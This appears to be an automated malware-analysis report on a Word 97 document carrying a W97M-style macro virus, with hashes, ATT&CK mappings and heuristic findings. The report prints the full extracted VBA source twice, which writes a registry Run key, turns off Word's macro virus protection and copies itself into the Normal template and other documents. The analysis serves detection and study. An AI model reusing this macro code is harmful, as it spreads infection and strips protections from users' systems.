Office (OLE) malware analysis — malicious · 26be5e8f71b9366a

MALICIOUS

Office (OLE)

27.0 KB Created: 1999-06-12 16:11:00 Authoring application: Microsoft Word 8.0 First seen: 2015-10-13

MD5: edc8999de623ef1e6b6f4e197cfe1840 SHA-1: 213225351b17e46a27c2d1b6d3dfee760d5d425c SHA-256: 26be5e8f71b9366ae8f80b807db32cbbb5b998d979c4648879f70d48aed6caaa

168 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1553.005 Rely on Misinformation

The VBA macro contains logic to disable macro protection and replicate its own code into a new file named 'Jamie.dll'. It also attempts to establish persistence by writing an entry to the registry Run key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Jamie', pointing to a VBScript that will execute 'Jamie.sys'. This indicates a self-replicating macro designed for persistence and potential further payload delivery.

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
Print #1, "Jamie.Options.VirusProtection = False"
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Print #1, "Set Jamie = WScript.CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Print #1, "Private Sub Document_Open()"
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1490 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1490 bytes
SHA-256: `fb640aa73782bfd78027c9269fa4f3ea570b60cf191393c174b3128ca4f4cef9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Close() A = Int(Rnd * 99999) & ".vbs" B = "C:\WINDOWS\SYSTEM\" & A C = "C:\WINDOWS\SYSTEM\" & "Jamie.sys" D = "C:\WINDOWS\SYSTEM\" & "Jamie.dll" If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Jamie") = "" Then System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Jamie") = B End If ActiveDocument.VBProject.VBComponents.Item(1).Export D Open B For Output As #1 Print #1, "Set Jamie = WScript.CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")" Print #1, "Jamie.Options.VirusProtection = False" Print #1, "Jamie.Options.SaveNormalPrompt = False" Print #1, "Jamie.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile(" & Chr(34) & C & Chr(34) & ")""" Print #1, "Jamie.Application.Quit" Close #1 Open C For Output As #1 Print #1, "Private Sub Document_Open()" Print #1, "ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (" & Chr(34) & D & Chr(34) & ")" Print #1, "With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule" Print #1, "For x = x To 3" Print #1, ".DeleteLines 1" Print #1, "Next" Print #1, "End With" Print #1, "End Sub" End Sub

SHA-256: fb640aa73782bfd78027c9269fa4f3ea570b60cf191393c174b3128ca4f4cef9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
A = Int(Rnd * 99999) & ".vbs"
B = "C:\WINDOWS\SYSTEM\" & A
C = "C:\WINDOWS\SYSTEM\" & "Jamie.sys"
D = "C:\WINDOWS\SYSTEM\" & "Jamie.dll"
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Jamie") = "" Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Jamie") = B
End If
ActiveDocument.VBProject.VBComponents.Item(1).Export D
Open B For Output As #1
Print #1, "Set Jamie = WScript.CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "Jamie.Options.VirusProtection = False"
Print #1, "Jamie.Options.SaveNormalPrompt = False"
Print #1, "Jamie.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile(" & Chr(34) & C & Chr(34) & ")"""
Print #1, "Jamie.Application.Quit"
Close #1
Open C For Output As #1
Print #1, "Private Sub Document_Open()"
Print #1, "ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (" & Chr(34) & D & Chr(34) & ")"
Print #1, "With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule"
Print #1, "For x = x To 3"
Print #1, ".DeleteLines 1"
Print #1, "Next"
Print #1, "End With"
Print #1, "End Sub"
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.